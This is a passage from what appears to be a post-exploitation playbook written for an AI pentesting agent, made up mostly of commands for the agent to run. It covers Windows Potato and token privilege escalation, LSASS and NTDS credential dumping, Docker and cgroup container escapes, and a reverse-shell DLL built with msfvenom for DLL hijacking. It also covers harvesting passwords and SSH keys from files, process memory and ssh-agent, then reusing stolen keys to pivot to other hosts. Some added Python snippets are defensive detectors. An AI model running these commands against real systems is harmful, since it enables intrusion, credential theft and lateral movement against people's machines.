kali(command="searchsploit seimpersonate")

Download the binary to the target — serve from Kali via HTTP or SMB, then fetch on target:

# Kali: serve files via HTTP
kali(command="cd /tmp && wget -q https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe && python3 -m http.server 8888 &")

# Target: download via PowerShell or certutil
powershell -c "Invoke-WebRequest http://KALI_IP:8888/GodPotato-NET4.exe -OutFile C:\temp\gp.exe"
certutil -urlcache -split -f http://KALI_IP:8888/GodPotato-NET4.exe C:\temp\gp.exe

Well-known Potato variants (examples — new variants are published regularly, always search):

Attack OS Range Command
GodPotato Server 2012-2022, Win 8.1-11 GodPotato-NET4.exe -cmd "cmd /c whoami"
PrintSpoofer Win 10, Server 2016/2019 PrintSpoofer64.exe -i -c cmd
JuicyPotato Server 2008-2016, Win 7-10 pre-1809 JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *
RoguePotato Win 10 1809+, Server 2019 RoguePotato.exe -r ATTACKER_IP -e "cmd /c whoami" -l 9999
SweetPotato Win 10, Server 2016/2019 SweetPotato.exe -e EfsRpc -p cmd.exe -a "/c whoami"

Selection: GodPotato first (broadest), PrintSpoofer on 2016/2019, JuicyPotato on pre-1809, RoguePotato when JuicyPotato fails on 1809+. If all fail, search for newer variants — CoercedPotato, LocalPotato, SharpEfsPotato, etc.

JuicyPotato CLSID: requires a valid CLSID for the target OS. Look up at https://ohpe.it/juicy-potato/CLSID/ or try {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} (BITS) as a common default.

Windows Token Manipulation

These are well-known privilege-to-attack mappings — but new token abuse techniques emerge. For any privilege not listed, search searchsploit <privilege_name> and check HackTricks:

Privilege Exploitation Tool/Command
SeImpersonate Potato attacks See table above
SeDebugPrivilege LSASS dump, process injection procdump64.exe -accepteula -ma lsass.exe lsass.dmp or nxc smb TARGET -u USER -p PASS -M lsassy
SeBackupPrivilege Read SAM/SYSTEM/NTDS.dit reg save HKLM\SAM sam.bak && reg save HKLM\SYSTEM system.bak then impacket-secretsdump -sam sam.bak -system system.bak LOCAL
SeRestorePrivilege Write any file — DLL overwrite Overwrite service DLL, restart service for SYSTEM shell
SeTakeOwnership Take ownership of protected files takeown /f C:\Windows\System32\config\SAM && icacls ... /grant USER:F
SeAssignPrimaryToken Create process with other token Same Potato attacks with -t createprocess

SeBackupPrivilege — DC NTDS extraction:

kali(command="nxc smb TARGET -u USER -p PASS -x 'wmic shadowcopy call create Volume=C:\\'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit c:\\temp\\ntds.dit'")
kali(command="impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL")

Phase 2D — Docker / Container Escape

Negative finding rule: You MUST file a finding for container capability enumeration even when no escape is possible. A negative "container hardened — no escape vector" finding documents due diligence and prevents the report reader from wondering if this was skipped. Enumerate capabilities first, then attempt escapes based on what's present:

kali(command="ssh user@TARGET 'capsh --print 2>/dev/null; cat /proc/self/status | grep Cap; grep -i docker /proc/1/cgroup 2>/dev/null; ls -la /var/run/docker.sock 2>/dev/null; cat /.dockerenv 2>/dev/null && echo IN_CONTAINER'")

Then file a finding regardless of the outcome:

  • If escape succeeded: severity=critical, document the technique
  • If no escape vector found: severity=info, title "Container Escape: Not Exploitable", notes = capabilities listed, docker.sock status, cgroup write status
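Added example (not from the original skill): decoding the CapEff/CapBnd masks that the `grep Cap` line above prints, so the Phase 2D finding, exploitable or "Not Exploitable", is backed by the actual capability set rather than a guess. The /proc/self/status excerpts are constructed samples; the capability numbering is the kernel's own (include/uapi/linux/capability.h) and the default mask is Docker's.

```python
# Linux capability numbering: bit index -> name (include/uapi/linux/capability.h).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# CapEff of a container started without --privileged or --cap-add (Docker default set).
DOCKER_DEFAULT_MASK = 0x00000000A80425FB

# Capabilities the Phase 2D checklist treats as escape enablers.
ESCAPE_CAPS = {
    "cap_sys_admin": "mount / cgroup release_agent escape",
    "cap_sys_ptrace": "inject into host processes when the PID namespace is shared",
    "cap_sys_module": "load a kernel module on the host kernel",
    "cap_sys_rawio": "raw access to host block devices",
}
SECCOMP_MODES = {"0": "disabled", "1": "strict", "2": "filter"}

# Constructed /proc/self/status excerpts: a default container and a --privileged one.
DEFAULT_STATUS = """\
Name:\tsh
NoNewPrivs:\t0
Seccomp:\t2
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""
PRIVILEGED_STATUS = """\
Name:\tsh
NoNewPrivs:\t0
Seccomp:\t0
CapInh:\t0000000000000000
CapPrm:\t000001ffffffffff
CapEff:\t000001ffffffffff
CapBnd:\t000001ffffffffff
CapAmb:\t0000000000000000
"""


def decode_caps(hexmask):
    """Turn a Cap* hex mask from /proc/PID/status into capability names, low bit first."""
    mask = int(hexmask, 16)
    return [CAP_NAMES[i] if i < len(CAP_NAMES) else f"cap_{i}"
            for i in range(mask.bit_length()) if mask >> i & 1]


def parse_status(text):
    """Pull the Cap*, NoNewPrivs and Seccomp fields out of /proc/self/status."""
    fields = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.startswith("Cap") or key in ("NoNewPrivs", "Seccomp"):
            fields[key] = value.strip()
    return fields


def assess_container(status_text, docker_sock=False):
    """Build the Phase 2D finding: candidate vectors, or the negative finding."""
    fields = parse_status(status_text)
    eff_hex = fields.get("CapEff", "0")
    effective = decode_caps(eff_hex)
    findings = [(cap, ESCAPE_CAPS[cap]) for cap in effective if cap in ESCAPE_CAPS]
    if docker_sock:
        findings.append(("docker.sock", "Docker socket reachable: a container can be "
                                        "started with the host root mounted"))
    # The page rates a *confirmed* escape critical; candidates still need testing.
    return {
        "effective": effective,
        "profile": "docker default" if int(eff_hex, 16) == DOCKER_DEFAULT_MASK else "custom",
        "seccomp": SECCOMP_MODES.get(fields.get("Seccomp", ""), "unknown"),
        "no_new_privs": fields.get("NoNewPrivs") == "1",
        "findings": findings,
        "severity": "critical" if findings else "info",
        "title": "Container Escape: " + ("Candidate vectors present" if findings
                                         else "Not Exploitable"),
    }


if __name__ == "__main__":
    for label, status in (("default", DEFAULT_STATUS), ("privileged", PRIVILEGED_STATUS)):
        r = assess_container(status)
        print(f"{label}: {r['title']} ({r['profile']}, seccomp {r['seccomp']}, "
              f"{len(r['effective'])} caps)")
        for cap, why in r["findings"]:
            print(f"  {cap}: {why}")
```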

Detect container:

kali(command="ssh user@TARGET 'cat /proc/1/cgroup 2>/dev/null | grep -i docker && ls -la /.dockerenv 2>/dev/null'")

Docker socket abuse (docker.sock accessible):

# Mount host root into new container
kali(command="ssh user@TARGET 'docker run -v /:/hostfs --rm alpine chroot /hostfs /bin/bash -c \"id && cat /etc/shadow\"'")
# Privileged container with host namespaces
kali(command="ssh user@TARGET 'docker run --privileged --pid=host --net=host -v /:/hostfs --rm alpine chroot /hostfs /bin/bash'")
# Deploy SSH key to host root
kali(command="ssh user@TARGET 'docker run -v /:/h --rm alpine sh -c \"echo \\\"ssh-rsa AAAA...\\\" >> /h/root/.ssh/authorized_keys\"'")

cgroup escape (notify_on_release, inside container with cgroup write):

kali(command="ssh user@TARGET 'mkdir -p /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x && echo 1 > /tmp/cgrp/x/notify_on_release && host_path=$(sed -n \"s/.*upperdir=\\([^,]*\\).*/\\1/p\" /etc/mtab) && echo \"$host_path/cmd\" > /tmp/cgrp/release_agent && echo \"#!/bin/sh\" > /cmd && echo \"cat /etc/shadow > $host_path/out\" >> /cmd && chmod +x /cmd && sh -c \"echo \\$\\$ > /tmp/cgrp/x/cgroup.procs\"'")

CAP_SYS_ADMIN + mount (mount host disk):

kali(command="ssh user@TARGET 'capsh --print 2>/dev/null; mkdir -p /mnt/host && mount /dev/sda1 /mnt/host && ls /mnt/host/root/'")

nsenter escape (privileged + host PID ns):

kali(command="ssh user@TARGET 'nsenter -t 1 -m -u -i -n -p -- /bin/bash -c \"id && cat /etc/shadow\"'")

Phase 2E — DLL Hijacking (Windows)

Step 1 — Find writable PATH directories:

kali(command="nxc smb TARGET -u USER -p PASS -x 'for %d in (\"%PATH:;=\", \"%\") do @icacls \"%~d\" 2>nul | findstr /i \"(F) (M) (W) everyone users authenticated\"'")

Step 2 — Find DLL hijack targets:

Enumerate services with missing DLLs dynamically using Process Monitor or by checking known targets. These are common examples — DLL hijack opportunities depend on installed software and OS version:

Service Missing DLL Context
IKEEXT wlbsctrl.dll SYSTEM
NetMan wlanapi.dll SYSTEM (no WiFi)
SessionEnv TSMSISrv.dll SYSTEM (RDP)
Spooler Various filter DLLs SYSTEM

For a more complete list, search dynamically:

kali(command="searchsploit dll hijack windows privilege")

DLL search order (with SafeDllSearchMode on, the default): the application's directory, System32, the 16-bit System directory, the Windows directory, the current working directory, then each PATH directory in order.

Step 3 — Deploy and trigger:

kali(command="msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o /tmp/evil.dll")
kali(command="nxc smb TARGET -u USER -p PASS --put-file /tmp/evil.dll 'C:\\Users\\Public\\wlbsctrl.dll'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'sc stop IKEEXT && sc start IKEEXT'")

Phase 3 — Credential Harvesting

Linux Credentials

kali(command="ssh user@TARGET 'find / \\( -name \"*.conf\" -o -name \".env\" -o -name \"*.ini\" -o -name \"config.json\" -o -name \"config.yml\" -o -name \"config.yaml\" -o -name \"*.properties\" -o -name \"web.config\" \\) 2>/dev/null | xargs grep -l -i \"password\\|secret\\|token\\|dsn\\|connectionstring\" 2>/dev/null | head -20'")

| Location | Command |
|---|---|
| Shadow file | `cat /etc/shadow` |
| SSH keys | `find / -name id_rsa -o -name id_ed25519 -o -name id_ecdsa 2>/dev/null` |
| History | `cat ~/.bash_history ~/.mysql_history 2>/dev/null \| grep -i pass` |
| DB/app configs | `find /opt /var/www /etc /srv -name "config*" -o -name ".env" 2>/dev/null \| xargs grep -li password 2>/dev/null` |
| Process env | `strings /proc/*/environ 2>/dev/null \| grep -i pass` |
| Auth/audit logs | `grep -rE 'comm="su"\|comm="sudo"\|pam_unix.*authentication' /var/log/audit/ /var/log/auth.log 2>/dev/null \| head -20` (`-E` so that `\|` is alternation rather than a literal pipe) |

If the current user is in the adm group (check the id output), auth and audit logs are readable and often contain passwords: the Linux audit daemon, with pam_tty_audit keystroke logging enabled, records su/sudo sessions including the typed password in the hex-encoded data= field of type=TTY records. Decode the hex with echo 'HEX' | xxd -r -p.
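
Added example, not part of the post-exploit skill: a Python parser for auditd's key=value record format that reports which type=TTY records carry captured keystrokes (and whether a full line ending in Enter was captured), which is exactly the exposure described above, without decoding the captured text. The audit lines in SAMPLE_AUDIT are constructed, including the hex payloads; `log_readable_beyond_root` is the companion permission check for the adm-group case.

```python
"""Detect keystroke capture in Linux audit logs.

Added example, not part of the post-exploit skill: parses auditd records
and reports type=TTY entries whose data= field holds hex-encoded keystrokes
(pam_tty_audit logging). SAMPLE_AUDIT is constructed; the sessions and hex
payloads in it are not real.
"""
import re
import stat

# Constructed audit records in auditd's native key=value format.
SAMPLE_AUDIT = """\
type=USER_AUTH msg=audit(1700000000.101:201): pid=4321 uid=1000 auid=1000 ses=3 msg='op=PAM:authentication grantors=pam_unix acct="root" exe="/usr/bin/su" hostname=? addr=? terminal=pts/1 res=success'
type=TTY msg=audit(1700000000.102:202): tty pid=4321 uid=1000 auid=1000 ses=3 major=136 minor=1 comm="su" data=6578616D706C650D
type=TTY msg=audit(1700000000.150:203): tty pid=4400 uid=1000 auid=1000 ses=3 major=136 minor=1 comm="bash" data=6C73202D6C610D
type=SYSCALL msg=audit(1700000000.200:204): arch=c000003e syscall=59 success=yes exit=0 comm="id" exe="/usr/bin/id"
"""

# key=value pairs; values may be single-quoted, double-quoted, or bare.
FIELD_RE = re.compile(r"(\w+)=('[^']*'|\"[^\"]*\"|\S+)")
MSG_RE = re.compile(r"audit\((\d+\.\d+):(\d+)\)")


def parse_record(line):
    """Split one audit record into a dict; nested msg='k=v ...' fields are flattened."""
    fields = {k: v.strip("'\"") for k, v in FIELD_RE.findall(line)}
    if "=" in fields.get("msg", ""):
        fields.update({k: v.strip("'\"") for k, v in FIELD_RE.findall(fields["msg"])})
    m = MSG_RE.search(line)
    if m:
        fields["timestamp"] = float(m.group(1))
        fields["serial"] = int(m.group(2))
    return fields


def keystroke_records(lines):
    """Return TTY records that carry captured input, without decoding the text itself."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") != "TTY" or not rec.get("data"):
            continue
        raw = bytes.fromhex(rec["data"])
        hits.append({
            "serial": rec.get("serial"),
            "auid": rec.get("auid"),
            "comm": rec.get("comm"),
            "bytes": len(raw),
            # A trailing CR/LF means a complete line (e.g. a password plus Enter) was captured.
            "complete_line": raw.endswith((b"\r", b"\n")),
        })
    return hits


def auth_prompt_captures(lines):
    """Serials of TTY captures taken while su or sudo was the foreground command."""
    return [h["serial"] for h in keystroke_records(lines) if h["comm"] in ("su", "sudo")]


def log_readable_beyond_root(mode):
    """True when a log file's st_mode grants group or other read access (the adm-group case)."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


if __name__ == "__main__":
    lines = SAMPLE_AUDIT.splitlines()
    for hit in keystroke_records(lines):
        print(hit)
    print("captures during su/sudo:", auth_prompt_captures(lines))
    print("0640 readable by group:", log_readable_beyond_root(0o640))
```

On a live host the same question is answered by `aureport --tty` as root; the point of the parser is that any account that can read the log can pull these records out, so the fix is to disable `log_passwd` in the pam_tty_audit configuration and keep audit.log at mode 0600.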

Hash cracking: kali(command="john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/shadow-hashes.txt")

SSH Key Harvesting and Reuse

# Step 1: Find all private keys
kali(command="ssh user@TARGET 'find / \\( -name id_rsa -o -name id_ed25519 -o -name id_ecdsa -o -name \"*.pem\" \\) 2>/dev/null | while read f; do echo \"=== $f ($(stat -c %U $f)) ===\"; head -2 \"$f\"; done'")

# Step 2: Map trust via authorized_keys
kali(command="ssh user@TARGET 'find / -name authorized_keys 2>/dev/null | while read f; do echo \"=== $f ===\"; awk \"{print NR, \\$NF}\" \"$f\"; done'")

# Step 3: Discover targets from known_hosts
kali(command="ssh user@TARGET 'find / -name known_hosts 2>/dev/null | while read f; do awk \"{print \\$1}\" \"$f\"; done | sort -u'")

# Step 4: SSH agent hijacking
kali(command="ssh user@TARGET 'find /tmp -name \"agent.*\" -type s 2>/dev/null'")
kali(command="ssh user@TARGET 'export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.PID && ssh-add -l'")
kali(command="ssh user@TARGET 'export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.PID && ssh -o StrictHostKeyChecking=no root@10.0.0.5 id'")

# Step 5: Test keys against discovered hosts
kali(command="for key in /tmp/stolen_keys/*; do for host in $(cat /tmp/targets.txt); do ssh -i $key -o BatchMode=yes -o ConnectTimeout=3 root@$host 'hostname && id' 2>/dev/null && echo \"SUCCESS: $key -> $host\"; done; done")

Credential Harvesting from Memory

# Dump env vars from all accessible processes
kali(command="ssh user@TARGET 'for pid in $(ls /proc/ | grep -E \"^[0-9]+$\"); do strings /proc/$pid/environ 2>/dev/null | grep -iE \"(PASS|SECRET|TOKEN|API)=\" && echo \"[PID:$pid $(cat /proc/$pid/cmdline 2>/dev/null | tr \"\\0\" \" \")]\"; done 2>/dev/null | head -50'")

# Extract strings from process heap (requires root)
kali(command="ssh user@TARGET 'PID=$(pgrep -f apache2 | head -1) && cat /proc/$PID/maps | grep heap | awk -F\"[- ]\" \"{printf \\\"dd if=/proc/$PID/mem bs=1 skip=\\$((16#%s)) count=\\$((16#%s - 16#%s)) 2>/dev/null\\n\\\", \\$1, \\$2, \\$1}\" | sh | strings | grep -iE \"password|secret\" | head -20'")

# SSH key recovery from ssh-agent memory
kali(command="ssh user@TARGET 'for pid in $(pgrep ssh-agent); do cat /proc/$pid/mem 2>/dev/null | strings | grep -A 30 \"BEGIN.*PRIVATE KEY\" | head -40; done'")

# Browser credentials — Chrome Login Data and Firefox logins.json
kali(command="ssh user@TARGET 'find / -path \"*/.config/google-chrome/Default/Login Data\" -o -path \"*/.mozilla/*/logins.json\" 2>/dev/null'")

Windows Credentials

| Location | Command |
|---|---|
| SAM/SYSTEM | `impacket-secretsdump USER:PASS@TARGET` |
| LSASS | `nxc smb TARGET -u USER -p PASS -M lsassy` |
| WiFi | `netsh wlan show profile name=X key=clear` |
| Saved creds | `cmdkey /list` |
| Registry | `reg query HKLM /s /f password \| head -50` |
| Browser | `nxc smb TARGET -u USER -p PASS -M chromium` |
| NTFS ADS | `dir /r C:\Users\` (check for Alternate Data Streams hiding data in files) |
| DPAPI | `impacket-dpapi masterkey -file KEYFILE -sid SID -password PASS` |

Phase 4 — Persistence Assessment (standard+)

Linux Persistence Vectors

| Vector | Check | ATT&CK |
|---|---|---|
| Cron jobs | `crontab -l; ls -la /etc/cron*` | T1053.003 |
| SSH authorized_keys | `find / -name authorized_keys 2>/dev/null` | T1098.004 |
| Systemd services | `systemctl list-unit-files` | T1543.002 |
| Bash profile | `cat ~/.bashrc ~/.bash_profile /etc/profile` | T1546.004 |
| LD_PRELOAD | `cat /etc/ld.so.preload 2>/dev/null` | T1574.006 |
| Init scripts | `ls /etc/init.d/` | T1037.004 |
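
Added example, not part of the post-exploit skill: Python baseline checks for three of the vectors in the table above, each taking the text of the artifact the check column produces (crontab output, an authorized_keys file, /etc/ld.so.preload) and returning findings tagged with the table's ATT&CK IDs. The sample inputs are constructed; the hostnames, key material and library path in them are made up. The heuristics (scratch-directory paths, download-to-shell pipes, keys without `from=`/`command=` restrictions, any ld.so.preload entry) are this example's own choices.

```python
"""Baseline checks for the Linux persistence vectors in the table above.

Added example, not part of the post-exploit skill: each function takes the
text of the artifact the table tells you to inspect and returns
(ATT&CK ID, detail) findings. All sample inputs are constructed.
"""
import re

ATTACK_IDS = {
    "cron": "T1053.003",
    "authorized_keys": "T1098.004",
    "ld.so.preload": "T1574.006",
}

# Constructed samples of the artifacts the table points at.
SAMPLE_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /dev/shm/.x/beacon
@reboot curl -s http://updates.example.invalid/p | sh
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyDataConstructedKeyDat admin@workstation
from="10.0.0.2",command="/usr/bin/rsync --server" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABConstructed backup@bak01
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABConstructedToo
"""
SAMPLE_LD_PRELOAD = "/usr/lib/x86_64-linux-gnu/libhook_constructed.so\n"

SCRATCH_DIR_RE = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/")
DOWNLOAD_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
KEY_TYPE_RE = re.compile(r"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-\S+|sk-\S+)$")


def audit_crontab(text):
    """Flag cron entries that run from scratch directories or pipe a download into a shell."""
    findings = []
    for line in text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#") or "=" in entry.split()[0]:
            continue  # blank, comment, or VAR=value line
        if SCRATCH_DIR_RE.search(entry) or DOWNLOAD_TO_SHELL_RE.search(entry):
            findings.append((ATTACK_IDS["cron"], entry))
    return findings


def audit_authorized_keys(text, expected_comments=()):
    """Flag keys lacking from=/command= restrictions or carrying a comment outside the expected set."""
    findings = []
    for line in text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        tokens = entry.split()
        # Layout is [options] keytype base64 [comment]; the key type token splits the parts.
        idx = next((i for i, t in enumerate(tokens) if KEY_TYPE_RE.match(t)), None)
        if idx is None or idx + 1 >= len(tokens):
            findings.append((ATTACK_IDS["authorized_keys"], f"unparseable entry: {entry[:40]}"))
            continue
        options = " ".join(tokens[:idx])
        comment = " ".join(tokens[idx + 2:]) or "<no comment>"
        if "from=" not in options and "command=" not in options:
            findings.append((ATTACK_IDS["authorized_keys"], f"unrestricted key: {comment}"))
        if expected_comments and comment not in expected_comments:
            findings.append((ATTACK_IDS["authorized_keys"], f"unexpected key: {comment}"))
    return findings


def audit_ld_preload(text):
    """Any library listed in /etc/ld.so.preload is injected into every dynamically linked process."""
    return [(ATTACK_IDS["ld.so.preload"], entry)
            for entry in (l.strip() for l in text.splitlines())
            if entry and not entry.startswith("#")]


def audit_all(crontab, authorized_keys, ld_preload, expected_comments=()):
    """Combine the three checks into one finding list."""
    return (audit_crontab(crontab)
            + audit_authorized_keys(authorized_keys, expected_comments)
            + audit_ld_preload(ld_preload))


if __name__ == "__main__":
    for attack_id, detail in audit_all(SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS,
                                       SAMPLE_LD_PRELOAD, ("admin@workstation", "backup@bak01")):
        print(f"[{attack_id}] {detail}")
```

Feed it the real artifacts by reading the output of the table's check commands; `expected_comments` is the list of key owners the host is supposed to trust, so any key outside it surfaces as a T1098.004 finding even when it looks otherwise ordinary.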

Windows Persistence Vectors

| Vector | Check | ATT&CK |
|---|---|---|
| Startup folder | `dir "%APPDATA%\...\Startup"` | T1547.001 |
| Registry Run keys | `reg query HKLM\...\CurrentVersion\Run` | T1547.001 |
| Scheduled tasks | `schtasks /query /fo LIST` | T1053.005 |
| Services | `sc query state= all` | T1543.003 |
| WMI subscriptions | `Get-WMIObject -Class __EventFilter` | T1546.003 |
| DLL hijacking | Check PATH for writable dirs | T1574.001 |

Phase 5 — Pivot Preparation (thorough)

kali(command="ssh user@TARGET 'arp -a && cat /etc/hosts && ip neigh'")
kali(command="ssh user@TARGET 'for port in 22 80 443 445 3389 5985 8080; do (echo > /dev/tcp/10.0.0.1/$port) 2>/dev/null && echo 10.0.0.1:$port open; done'")
kali(command="nxc smb 10.0.0.0/24 -u HARVESTED_USER -p HARVESTED_PASS")
kali(command="ssh -i /tmp/stolen_key -o StrictHostKeyChecking=no user@10.0.0.5 'hostname && id'")

Call report(action="diagram", data={...}) with pivot map:

flowchart TD
    Init["Compromised: 10.0.0.10"] --> Cred["Cred Reuse"]
    Cred --> DB["10.0.0.5 (mysql)"]
    Cred --> Bak["10.0.0.20 (backup)"]
    Init --> Key["SSH Key Reuse"]
    Key --> Adm["10.0.0.2 (admin)"]
    Adm --> DC["10.0.0.1 (DC)"]

Phase 6 — Verification & PoC

For every confirmed finding:

  1. report(action="note", data={...}) explaining the finding
  2. Document exact reproduction steps
  3. http(action="save_poc", ...) with descriptive title (e.g., privesc-suid-python3)
  4. report(action="finding", data={...}) — severity: Critical (root/SYSTEM), High (privesc), Medium (cred exposure). Include ATT&CK ID and raw evidence.

Phase 7 — Report & Wrap-Up

  1. report(action="diagram", data={...}) — complete post-exploitation map: access, privesc path, creds, persistence, lateral movement
  2. report(action="note", data={...}) with summary:

     Post-Exploitation Summary:
       Initial access:        [method, user, privileges]
       Privilege escalation:  [method or "not achieved"]
       Credentials harvested: [count, types]
       Persistence vectors:   [count, types]
       Lateral movement:      [reachable hosts, results]

  3. session(action="complete", options={...}) with summary

Chaining Other Skills

| Skill | When to invoke |
|---|---|
| /lateral-movement | Credentials and pivot opportunities identified — pass-the-hash, Kerberoasting, NTLM relay |
| /credential-audit | Need to crack harvested hashes or test credentials — hydra, john, hashcat |
| /container-k8s-security | Container escape achieved to K8s node — assess cluster from internal perspective |
| /network-assess | Internal network access from compromised host — segmentation testing, SNMP/NFS/SMB enum |
| /ssl-tls-audit | Internal TLS services discovered — audit certificates and crypto on internal services |
| /threat-modeling | Post-exploitation complete — STRIDE analysis of the compromised architecture |
| /gh-export | When user asks to file GitHub issues |

Context Recovery After Compaction

When your context is compacted mid-skill:

  1. Call session(action="recovery") before doing anything else — returns tools_already_run, in_progress_cells, pending_escalations, and EXECUTE_NOW
  2. Resume in_progress cells first — notes record which privesc vectors were partially enumerated or attempted
  3. Follow pending_escalations — escalation leads from findings (e.g., "crack hash from /etc/shadow", "test SUID binary X") that were not yet completed
  4. Skip enumeration steps in tools_already_run — do not re-run linpeas/winpeas if already in the log
  5. Never mark a privesc finding from memory — after compaction, re-run the confirming command before reporting

Rules

  • session(action="start", options={...}) is mandatory — never run any other tool before it
  • Batch independent tools in the same response — they execute in parallel
  • When any tool returns a LIMIT message, stop immediately and call session(action="complete", options={...})
  • Follow the decision tree — check sudo/SUID before kernel exploits, check token privileges before Potato selection
  • Enumerate before escalating — understand the system before attempting privesc
  • Harvest everything — config files, history, SSH keys, process memory, credential stores
  • Call report(action="finding", data={...}) for every finding — privesc paths, exposed credentials, persistence vectors
  • Use report(action="note", data={...}) liberally — document decisions and discoveries
  • Never fabricate findings — only report what commands confirm
  • Mermaid syntax rules: use flowchart TD, quote labels, no em-dashes, short alphanumeric node IDs
  • Call session(action="stop_kali") at the end if kali(command=...) was used

Install via CLI

npx skills add https://github.com/0x0pointer/skills --skill post-exploit